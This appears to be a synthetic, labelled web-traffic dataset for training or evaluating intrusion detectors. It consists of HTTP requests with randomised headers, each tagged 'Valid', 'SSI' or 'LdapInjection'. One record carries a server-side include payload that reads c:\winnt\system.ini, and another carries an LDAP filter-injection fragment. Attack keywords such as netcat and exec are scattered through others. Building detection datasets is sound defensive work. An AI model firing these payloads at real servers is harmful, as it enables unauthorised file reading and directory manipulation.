Accept-Language: F3degcs-f1q;q=0.0, wasK-anro
Cache-Control: min-fresh=2
Client-ip: 4.76.203.248
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="727"
Date: Sun, 12 Feb 06 20:39:34 GMT
ETag: W/"JCTn_ojKBCwZqY_Co"
Expect: ngo6Mwsy
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Mon, 01 Jun 09 09:15:42 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Jun 08 24:01:23 GMT
Max-Forwards: 572
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM bm41ZTRwbnFya2lxbnJ0aGR0RXQwZTVpc05zNGR0ZXJ5cnBvY2ZkZnNu
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: http://wdur.net/sesyo9yL/8sdprth/haer7.ace
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/0.3 (Windows; U; Win98 9.1; sa-fc; rv:8.7.8) Gecko/71664533
UA-CPU: 68000
UA-Disp: 1189,6667,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: Rengoa/6.8 www.SEtegt.gif, 7.6 www.ieaaDi.css, HTTP/6.2 77.82.62.233
Transfer-Encoding: compress
Upgrade: h9ve/7.6, nhnh/8.9, ajSeht/4.1, arunr/6.8, hoib/8.4
Warning: 262 www.yptv0dez.html "oibr8oPRotpdsee8a7ax" "Fri, 17 Aug 07 06:53:24 UTC"
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45521
Start - Id: 7852
class: Valid
POST /kdNj6bNiFlfDw1Z3H/aiEDqg/eecbukew/veogi6yillt0us/_VEGme7GNnph-t6N.exe? HTTP/1.1
Content-Length: 279
Content-Language: ei6m
Content-Encoding: identity
Content-Location: http://CentOoe.be/izFiv5.png
Content-MD5: ZHR5aWhlYWllcmxhbmlyNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Apr 09 07:01:43 UTC
Last-Modified: Mon, 09 Jul 07 14:56:22 GMT
Host: 43.254.106.211:1578
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 152.17.44.239
Cookie: HtezCezae=4779;oppnst=nhe;iyAenhn=9369;e35dsn4A8ol4=132542;tae=svbinnsjumshdo;stitEued=87
Cookie2: $Version="69"
Date: Thu, 05 Mar 09 10:44:39 UTC
ETag: "XZ-N4lID.peR7jC0Yvvu"
Expect: 100-continue
From: rnda3N@eUsEnd.cz
If-Modified-Since: Thu, 13 May 04 05:25:34 GMT
If-Unmodified-Since: Wed, 01 Dec 04 17:28:01 GMT
If-Match: "G_e.vBSxVBJOGN06RFNp"
If-None-Match: "yhA8NaXvPmLMSk@K"
If-Range: "RwMqNZoppBbHuPGkK"
Max-Forwards: 1847
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: Basic aG96dWx0OnJvRXFybnI=
Range: 3-90,72191-
Referer: http://B3ees6.com/eeslia/Ishc/itndta/tidsOo/ohafaAEe.wav
TE: deflate
Trailer: Connection
User-Agent: Mozilla/1.2 (compatible; MSIE 6.8; Windows NT; ptttUrEe; oHdCsfecn; ree8emsn6)
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 669x1617
Via: 0.3 43.225.204.54:8997
Transfer-Encoding: deflate
Upgrade: geop/6.3, gadsi/7.1, Risfc/1.7, ieeeh8/4.3, ht1/2.2
Warning: 393 www.e0nt7dn.jpeg "mel9ehnAlnr" "Sun, 07 Sep 08 05:30:02 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 660220011832076689
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

im='euo&1oseaaeubydenn=33&tons=tut&hptpusieel=rsKf&ooeibltr3oxaogr=l3hDietlO1otdzskVz&alnotrEwft6=646204087&cltp7meebx=c3rU1LZlR&NhMZ=qqMQc8.&aeTbesuoi8tz=xnoobti5r&mtsmct=sc&eiweNdnehw=ihqlpokles7a&s8phell0mdxnwp=?3gh/szkshutdownOtt&ofii6ces9=e'rha$s&EhQhtmpJOwfWy=759

End - Id: 7852
Start - Id: 40674
class: SSI
GET /9Q7G102/dyVr_wRe/mnoj5fenhc4teNidncne.msf?aapahe3g=6&8hmAd4=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&v01Lxp_09Jtk=41235163&30_drop_RsEAG=t%27%3D&8ootuttu8nhfhn=8286782&EtAeoeno7utbac0=mmRe&gocpuo5eIS=Te%3C&sEtaw=ealiraOyK9a&gJQCv2kZxvy=iwiMyM HTTP/1.0
Host: 197.50.52.97
Connection: giedpf
Accept: */*
Accept-Charset: x-mac-korean, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 146.221.195.70
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="927"
Date: Tue, 13 Jun 06 10:07:38 UTC
ETag: W/"6tZo9S-YZTOKLQo"
Expect: 100-continue
From: taaslTl@7ntsatsanh.cz
If-Modified-Since: Fri, 20 Mar 09 08:23:22 UTC
If-Unmodified-Since: Tue, 28 Sep 04 05:01:51 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Sep 08 17:30:46 GMT
Max-Forwards: 794
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nc=a9ACEB75
Authorization: caorZo lawtSv=Isnes
Range: 266226-,-04
Referer: http://aeoii4.fr/sesGo/An7jo/att8i/oxtmel.txt
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: ihj6@kqISX http://www.gearR.uk
UA-CPU: MIPS
UA-Disp: 155,8180,16
UA-OS: Windows 98
UA-Color: color8
Via: 4.1 162.74.80.124, HTTP/4.5 www.aiiAv.js:959
Transfer-Encoding: gzip
Upgrade: m3ott/2.6
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 13811936519957
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40674
Start - Id: 21651
class: Valid
GET /bz8TQSgOMFz/sd/lk_/tinclude/nhlfezegt5wl/gbvyAzKI.wsAeIFmwc/p8mVMbW7_vEWamB9m/tsawjR4.JN36Ak/nvTJ2/U9ir9ULBE/w7heommthrdpineo.tiff?LPt0Z3=16129&m4cctuRrvayAni=46377&XxQVxd-S=hiaaaOrinEsoeYey&oseooe8=Lmns&dn3oou8h=eopstaiwinntdHarsu&te=em&gocv7uITft=139092&0aabwaunROis6l=muv7no&ycPO3t2unrtmIn=e0ig%3Bsock_streambetweenajbNic+a&iuoti=%24netcate0orpCscrlul&4adow9ajm80d=070&erEreoct6Seu=7209 HTTP/1.1
Host: www.eeee18s7rn.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 211.84.162.129
Cookie: 1blrnibqD=5851;ehron68n=cm2aplnjc;em;rezh=68638;cfN26nmAe3R=eov:O o~t0Azevalxof@s;Amehohwwug=7t22nn8Gmut;MloodreMne=sirsuoRlsEfg
Cookie2: $Version="614"
Date: Wed, 05 May 04 10:31:25 UTC
ETag: W/"g-kp3mpGdOKD.w9SYxG"
Expect: 100-continue
From: ynfima@o2e6raaBs.org
If-Modified-Since: Mon, 02 Apr 07 13:46:12 GMT
If-Unmodified-Since: Fri, 05 Mar 04 06:56:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 26
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="mwtEreq"
Authorization: Basic ZWVvcjA6aXIwcjY=
Range: -70672,783-,227-
Referer: http://atyziI.cz/unnut.tiff
TE: trailers,trailers,gzip
Trailer: Host
User-Agent: Mozilla/0.4 (X11; U; SunOS sun4u 6.8; ti-ot; rv:1.5.0) Gecko/34354266
UA-CPU: PowerPC
UA-Disp: 4503,714,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 838x039
Via: 4.4 www.twri.png:9461
Transfer-Encoding: deflate
Upgrade: asow/5.8, xtg/8.7, Dbta/5.2
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 1329095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21651
Start - Id: 32987
class: Valid
POST /eedneieMsnctevh6e/phdilrpin6itzrPiFjo/TJ./d_9n8cVJi@GIt/gogealSshtmnrui/enss3r/breSPV.gif? HTTP/1.1
Content-Length: 153
Content-Language: hieT
Content-Encoding: gzip
Content-Location: http://nrlndna.net/wsue8ra/9tyDnln/aierg/altst1r.dll
Content-MD5: ZG9kdHp1b3ByNGxuSXRmZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Aug 04 11:38:25 UTC
Last-Modified: Tue, 07 Jul 09 20:58:18 GMT
Host: www.ws6s.cz
Connection: stgonc
Accept: image/gif, text/plain
Accept-Charset: gb2312;q=0.1, x-mac-arabic;q=0.8, x-mac-arabic, iso-2022-kr, x-mac-greek
Accept-Encoding: 
Accept-Language: 8xt-nreahlhr;q=0.8
Cache-Control: min-fresh=23
Client-ip: 59.189.132.168
Cookie: tdivOU4M7HE=SnyovlahemtneOokl;X2KmXREOyimg=oe%uw9vfa;bSwm9tmu1iechta=e9rvT;sock_streamf6HvO3K3=0658235;alt=600
Cookie2: $Version="812"
Date: Sun, 10 Oct 04 09:36:35 GMT
ETag: W/"ivkb-HZBwJXpc7uGkpG"
Expect: 100-continue
From: nxhoo@luihsl.gov
If-Modified-Since: Wed, 08 Apr 09 14:07:26 CET
If-Unmodified-Since: Tue, 10 Nov 09 01:12:48 UTC
If-Match: "AAKZwIwut_aQIT-Pras"
If-None-Match: "78D2AQwrO6.0R7ADD58"
If-Range: Fri, 19 Dec 08 19:14:42 UTC
Max-Forwards: 0
MIME-Version: 1.9
Pragma: nhewwN=fCtnal
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: Digest nonce
Range: -5326
Referer: http://oeyroIeF.de/tjoie9/4hsaer/li5Ovh.ace
TE: trailers,chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 2.1; Nn-er; rv:9.9.0) Gecko/91015218
UA-CPU: x86
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 596x2213
Via: ieOsy/5.8 203.70.53.22
Transfer-Encoding: compress
Upgrade: seoh/4.5, k3f0q/5.1
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 75673085046625
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XPLuRdhFc8r=S&-OYgh4= ea9idst&elrm=3&qFssRG0dYandscriptFL=sIp&0dnodez_@yLZlYFa=utis&uU-xJ4W0=aeebncbeoemin&8lsiQopkgow=8&saltshssoa=81363982&su=327041354

End - Id: 32987
Start - Id: 23919
class: Valid
GET /eT/aswwken/6LQCU.html? HTTP/1.0
Host: 115.245.108.148
Connection: keep-alive
Accept: image/gif;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=849
Client-ip: 18.137.112.142
Cookie: hc7qeietaeDsi=okasRALe8c;s0ndeh=76201;_Yf0IB1=4nmee7onaneftotblf
Cookie2: $Version="16"
Date: Sat, 04 Oct 08 07:11:32 CET
ETag: "f90EsG-wdKbXnHnr"
Expect: vxWocenj
From: gptydse@odstynsmus.de
If-Modified-Since: Fri, 09 Dec 05 15:50:03 GMT
If-Unmodified-Since: Sun, 17 Apr 05 20:44:21 CET
If-Match: "_-FZXaC2O43VtGba"
If-None-Match: "_sZyJldV5KyGQG7IG"
If-Range: "7N7iNCIAFf2iD4WY"
Max-Forwards: 8684
MIME-Version: 0.2
Pragma: nsTdd=uthqta7
Proxy-Authorization: NTLM NnVleW96U2JjdGVlc0VkbXN5c1dlaGVlOGVhdHRvdVNuZm5uZWF0
Authorization: Digest opaque="fwieel"
Range: -816974
Referer: http://www.Am52sg.org/Ltbtiihw/hu8cl/tsNe/idss.avi
TE: chunked;q=0.0,gzip;q=0.6,chunked
Trailer: If-Range
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 0.6; Hs-Ae; rv:3.4.6) Gecko/83077460
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 658x4367
Via: FTP/6.7 122.245.184.108:56, 7.0 www.ea87th.html:76
Transfer-Encoding: compress
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 59.99.49.22
X-Serial-Number: 383867
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23919
Start - Id: 5938
class: Valid
PUT /Hsineddm/fe/tep3/he86aaemlecal/Rperlfczs5i.jsp? HTTP/1.0
Content-Length: 80
Content-Language: v,viw0
Content-Encoding: compress
Content-Location: /exaOh/lkag/ohoo6oz/qtnt38rs/eheoop.avi
Content-MD5: b2JybnRldG5kcmZuaFN0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jan 05 08:37:06 UTC
Last-Modified: Thu, 05 Feb 04 08:18:19 CET
Host: 168.137.198.224
Connection: close
Accept: */*
Accept-Charset: x-mac-roman, euc-cn;q=0.4
Accept-Encoding: deflate;q=0.3, compress;q=0.8
Accept-Language: wava-o, uti-atdmcqhm;q=0.5
Cache-Control: max-age=2657
Client-ip: 182.209.58.87
Cookie: nph-styleXu0paccepty=sock_streamo5Hidsia;b9EoearrdiooaCc=MMri66ie6mmoaiMiry;JT7r=to?la;iZbhoRnetscqera=888;aol9iqB=5032
Cookie2: $Version="421"
Date: Mon, 02 Jul 07 12:58:54 UTC
ETag: W/"ZofDx5HpO_bdoX7MkU"
Expect: 100-continue
From: 6Etonmon@LhAh.gov
If-Modified-Since: Thu, 13 Aug 09 07:28:41 CET
If-Unmodified-Since: Fri, 03 Mar 06 01:23:56 UTC
If-Match: "r6UqtBRkDHLN29K"
If-None-Match: "6kq21K1wi_c2pklpwy"
If-Range: "dTl2gQhlGd9mRpXQhRmv"
Max-Forwards: 466
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: hEit lMChdia=aSawel
Authorization: NTLM c2FUWm9rZXd1aG4wZnFhaWVpaGxjNnRlc1Jzc2VUbTZldnR6
Range: 93-,751599-,-9
Referer: /twxvN/htwp.js
TE: trailers,gzip;q=0.0,trailers
Trailer: Range
User-Agent: Mozilla/5.8 (Windows; U; Win98 8.6; ia-iE; rv:5.2.6) Gecko/46416376
UA-CPU: x86
UA-Disp: 731,381,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3436x257
Via: 2.0 www.oseep.css, FTP/3.8 193.211.122.125:38768, HTTP/2.2 www.ziat.gif
Transfer-Encoding: deflate
Upgrade: afsh/5.8, swmsi4/2.6, 2M2rtn/1.3
Warning: 725 www.sdsWm.shtml "dsLrjmutignetroi5n" "Wed, 04 Jun 08 20:36:56 UTC"
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 235537183752
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7NwgetZCto29.Yf=Ide4ydae&e&tstdt4=374303&oaxvtmoce4Cyyr=e7umTets&seets0so=1522

End - Id: 5938
Start - Id: 22744
class: Valid
GET /eR73PJigKkr6/etsh9usetlN/nel.css?Z1y0SKe.u=9x%3Cah&Lhoo0=1&cU.g=8En3i%40xRi%5D&se6eyenci=nzCT&tthjntS4seeettE=execi2+e9ln%7Enaws&mUsock_streamenodeVyH=arcmdiI%28aaot7 HTTP/1.1
Host: 208.102.129.162:5510
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate, identity;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 111.95.11.244
Cookie: rY3.71dtCkk=24;8Igekedr99xsatt=80;arieieeDEecE=31;nullsnetcatIagoFM7xp_4=yHla
Cookie2: $Version="9"
Date: Tue, 05 Jul 05 18:32:36 GMT
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: syrwto
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Fri, 30 Jun 06 17:07:51 CET
If-Unmodified-Since: Mon, 28 Sep 09 16:51:55 UTC
If-Match: "_8iGAGe4imwVAX2pk_"
If-None-Match: *
If-Range: Tue, 26 Jun 07 02:07:11 GMT
Max-Forwards: 9
MIME-Version: 6.8
Pragma: ocI='i'
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: NTLM YTByZWhpaDNieG9vcmFpdEhydGFpNnF3YWgxYXQyOXRub29paXM4ZXNzOXA=
Range: 32-,55-8,-1
Referer: /eoOettt.zip
TE: gzip;q=0.5,gzip;q=0.5,trailers
Trailer: Referer
User-Agent: Mozilla/8.0 (compatible; MSIE 7.0; Win98; soSqbi; 19ocaduio)
UA-CPU: MIPS
UA-Disp: 156,3199,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 675x225
Via: 8.0 116.133.173.3
Transfer-Encoding: gzip
Upgrade: uetr/8.4, Iessr/8.0, rnltse/6.4, itwgpe/5.9, osht/4.7
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 247.95.67.80
X-Serial-Number: 46126280
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22744
Start - Id: 10735
class: Valid
GET /hNGwc2zNdgV-hj/ts1MahNc.mGVH1QaxMJa/2aLaFNHkw97M/cXPkhiv/Gvf3vrfHQ/scriptTCSFF/rre2stio/atoltAAueimTnezhcaty/mhjDT.gif?oeekoa671sCe=2&zd56hKoeokn=t1e&EImZrmD-CC3Q=ittio4&T7E8J-QJlikeDg=496476 HTTP/1.0
Host: www.uEGa.gov
Connection: tpiwa
Accept: */*
Accept-Charset: iso-8859-8;q=0.4, iso-8859-6;q=0.0, x-mac-cyrillic;q=0.0, iso-2022-jp;q=0.8
Accept-Encoding: 
Accept-Language: atonlsre-Eai
Cache-Control: no-transform
Client-ip: 192.113.215.254
Cookie: erhiJlxnvNvkaD=25496;etxD5h8FlaeaQm=76456;ynottEcuTdaFe=sock_streamcehninNcr 5npm tftpxe;amaTzasg=hai;felaMrfyciby78=kJqoyU_d
Cookie2: $Version="548"
Date: Mon, 04 Jul 05 09:06:40 GMT
ETag: "wdGz8qLEfzd2ZUYOvuM"
Expect: 100-continue
From: e5ma@4u4oer.net
If-Modified-Since: Mon, 07 Dec 09 03:38:12 UTC
If-Unmodified-Since: Wed, 21 Sep 05 02:12:42 CET
If-Match: "A.Rzy76zL9FbeapwH"
If-None-Match: *
If-Range: Fri, 18 Jan 08 07:29:29 UTC
Max-Forwards: 5
MIME-Version: 6.3
Pragma: ateo=0adst
Proxy-Authorization: Digest nonce
Authorization: NTLM ZHRzbWJ5dG50bGZlb2NlZWFJcmFoVE83ZlUwaGFhcmVodTVlNmFndQ==
Range: -44927,-01
Referer: /Ndiihet/eqau/o6aetyat.asmx
TE: chunked;q=0.2
Trailer: If-Range
User-Agent: 8XcFN1r http://www.tdaen.net
UA-CPU: PowerPC
UA-Disp: 5895,841,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 713x311
Via: 9.8 www.iauodrA.css, sd8aD/3.9 186.203.12.68, 8.0 www.iric4r.html
Transfer-Encoding: compress
Upgrade: hermne/8.2, rtea/6.7, TesMw/7.3, sTw1mc/8.9, YMs/1.2
Warning: 786 239.89.200.109 "camctrmexIt1" "Wed, 19 May 04 11:37:54 CET"
X-Forwarded-For: 39.67.73.35
X-Serial-Number: 62509497376132928
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10735
Start - Id: 18339
class: Valid
GET /iabpTg/ls20seissQiebR/iTnA7io.css?mailG9LOYH@7M=4&5aIfdqo2bAaoro=6oWI1T&h0daiegpgdtx=6&tiisssaw5pf=t++ec&on6ybp=dlchildettform HTTP/1.1
Host: 166.151.203.59:3
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 159.233.57.166
Cookie: eh1rtt=in ;era3eAfao=w-adivesteoatO;rwobefD=aVLYqsaf-;0Ffre=meoSZW
Cookie2: $Version="88"
Date: Sun, 17 Sep 06 22:40:02 GMT
ETag: W/"FrEg431hhzfkL2r1zPs"
Expect: eowpnop=pu8ih;rett
From: Eo7Oans@nl2o.ch
If-Modified-Since: Fri, 11 Sep 09 13:05:49 CET
If-Unmodified-Since: Mon, 20 Feb 06 22:20:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jun 07 22:45:24 GMT
Max-Forwards: 87
MIME-Version: 9.4
Pragma: mt24nP='oaAotd'
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: NTLM aG1hdXRsb25TcGFicmFpaHBoaWlRZWVycnJrZWFoY3Jlb2llb2FsZlRpZXNjZG5v
Range: 1528-
Referer: /nt8wsrRy/mmgye/je9Ea.mdb
TE: trailers
Trailer: Date
User-Agent: emdew8tl5L/6.6.6
UA-CPU: x86
UA-Disp: 350,951,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0744x394
Via: 8.4 67.76.201.40, 6.3 29.53.223.172
Transfer-Encoding: identity
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 357804395049751205
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18339
Start - Id: 1749
class: Valid
GET /tdsesoofoid.css?hgabeztgl=pYCk98TAEiLi&ws=5865018&cE4lsostoer=52399&e3uqam=Pyda%26ue6i&vtdiiEpo=464422&cqqBu=82&Go6eereiuochIta=6aNeo9nthGfero&Ms6jRqVXgKvbscript=ted%27 HTTP/1.0
Host: 14.194.22.78
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic, iso-8859-2
Accept-Encoding: *
Accept-Language: 3-2ea;q=0.9, gll-unlas, f-cres7ns;q=0.2
Cache-Control: only-if-cached
Client-ip: 68.102.193.74
Cookie: osemh=n4h;kIoBbT@4=0u;hn29sdsca=8;7NabinRgmBN9W=5637;Rn=78;et=433213407
Cookie2: $Version="3"
Date: Sun, 12 Aug 07 04:05:17 GMT
ETag: "F5NI49YY7B98KOY@WC"
Expect: 100-continue
From: Yhidhbtu@eacennne.it
If-Modified-Since: Sun, 06 Mar 05 22:19:19 CET
If-Unmodified-Since: Sat, 16 Feb 08 10:35:21 UTC
If-Match: "MSmVemY7Gi9izmmf"
If-None-Match: "-QuP8tEpItvIHvDIYXBk"
If-Range: Fri, 24 Oct 08 01:07:26 UTC
Max-Forwards: 9
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZXFlbmVuZTp6bDdib2k=
Authorization: oioeme jatri=amjnHhy
Referer: /n0hsa.jsp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.0 (compatible; 9AwIb; WinNT; LpbsT9i)
Via: HTTP/1.8 244.249.109.14
Transfer-Encoding: identity
Upgrade: sshb/4.0
Warning: 349 29.161.8.157:45 "ardi0B2bihia" 
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1749
Start - Id: 5404
class: Valid
POST /kg-ywindow.opens@copyC.shtml? HTTP/1.0
Content-Length: 174
Content-Language: 0otgul,Ssiu4,adncumd
Content-Encoding: identity
Content-Location: /ntmsl.gif
Content-MD5: eW90c3RlZWRjdGhTSWVzOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Nov 04 10:31:51 GMT
Last-Modified: Wed, 07 Feb 07 01:38:57 CET
Host: 87.184.216.12
Connection: keep-alive
Accept: image/*, audio/basic;q=0.6
Accept-Charset: macintosh;q=0.6
Accept-Encoding: *
Accept-Language: cl-naAee, aoP-dHtt;q=0.3
Cache-Control: max-age=901
Client-ip: 49.138.242.29
Cookie: cE=i3OtpaZeod;95ZFMviframe=ntemceegcITns;taSoerihal=8368905224
Cookie2: $Version="9"
Date: Sun, 06 Aug 06 01:26:18 UTC
ETag: W/"vt.0GkL2HP63RDUQ0If"
Expect: uools=kenw;bnaue4
From: heif@92m3ed.fr
If-Modified-Since: Fri, 27 May 05 11:53:34 UTC
If-Unmodified-Since: Fri, 31 Dec 04 10:43:36 CET
If-Match: "NQBokgsdNGLa51rKg4"
If-None-Match: "TGoGU@8K3qv@oeJ"
If-Range: Fri, 04 Apr 08 19:24:17 CET
Max-Forwards: 6230
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: sgjr Elepaa=Eepe
Authorization: Digest opaque="eauri"
Range: 33401-381,35239-,-73
Referer: /0Rmu/ojEln/i1eitr/jfrrni5.nsf
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/6.2 (compatible; MSIE 1.8; Windows NT; sgzerid; uyeydiel)
UA-CPU: x86
UA-Disp: 958,782,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 237x186
Via: 7.6 52.200.143.96
Transfer-Encoding: gzip
Upgrade: s4syeh/8.2, Palt/1.0
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 13.159.36.160
X-Serial-Number: 759836500
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

arhltnaoyanpane=7575&execiGgp1XAc=n0Xsxi&e3tsoB2Il=cbyr7ac |net/3h&dtso=covi'aeh&faeh1reog=hrpqhs|eaautoexecano&ah5holEvkns=ioaaw exec&etheaa=aJr8-ulA.E&rtie=46376211

End - Id: 5404
Start - Id: 37449
class: LdapInjection
GET /sniJs.swf?8utlelt=53&ixp_vwN=p%40wV2F2C&edNPi64v=1rrEl HTTP/1.1
Host: 191.181.193.26
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-8;q=0.9, x-mac-chinesesimp
Accept-Encoding: compress;q=0.0, deflate, deflate;q=0.3, identity
Accept-Language: *;q=0.7
Cache-Control: min-fresh=1982
Client-ip: 119.98.61.201
Cookie: -MvwinntkB0=eelecTytggeSnvya;coly=a8R_sJ6;t9eiper67m4hih9=oi9z;yNcJg9Yu=)   (  |  (fttb=lah*)
Cookie2: $Version="93"
Date: Fri, 28 Apr 06 22:07:50 CET
ETag: "hP0i7Xp59mTBOKjFVz"
Expect: ahtnadm
From: piod1nut@se9utn.fr
If-Modified-Since: Fri, 17 Jun 05 01:26:58 GMT
If-Unmodified-Since: Mon, 25 Aug 08 15:43:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Apr 10 08:58:07 UTC
Max-Forwards: 6
MIME-Version: 0.6
Pragma: sn2astr=oe7oj
Proxy-Authorization: NTLM bk1OOXNmaW1yN2d1ZWVoM2xpZTZlZWl0VnRvdGlxaGExZWZlbHVnZWZvcg==
Authorization: NTLM cGVkaWh0bG5zaWU5dHlhbmFwc2xTbHJvY2hwb242dU1oYXR3bw==
Range: -13
Referer: /aeMOup/le0dnF/rwieosa/6aSvu/yh8ttrek.gz
TE: chunked;q=0.8,gzip,gzip
Trailer: If-Range
User-Agent: wmaneudop (aZak2L)
UA-CPU: MIPS
UA-Disp: 5462,524,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 958x510
Via: 8.0 www.6N5a.js, 2.5 249.135.98.197, 1.8 www.nqgoo.jpeg
Transfer-Encoding: deflate
Upgrade: baet/2.2
Warning: 468 www.gctRbegg.shtml:3583 "godhcxdtTN" 
X-Forwarded-For: 157.150.92.233
X-Serial-Number: 9320114880
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37449
Start - Id: 6792
class: Valid
POST /s9/cehhlcarhuettEern/eeus0/twFservices/coQlVg5D7GdS6Tlk@P/CaNeoeeotlidi/jpS2oG13zRMJK-nc/tirdessou.php4? HTTP/1.1
Content-Length: 262
Content-Language: Ee,chh4tosn
Content-Encoding: deflate
Content-Location: /ayvht.pdf
Content-MD5: dGxzaGRpOExuc3pyY24zcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Sep 07 04:28:21 GMT
Last-Modified: Tue, 11 Aug 09 10:02:28 UTC
Host: www.Osfko.biz
Connection: keep-alive
Accept: audio/basic, application/zip;q=0.9, application/x-tar
Accept-Charset: *;q=0.6
Accept-Encoding: *
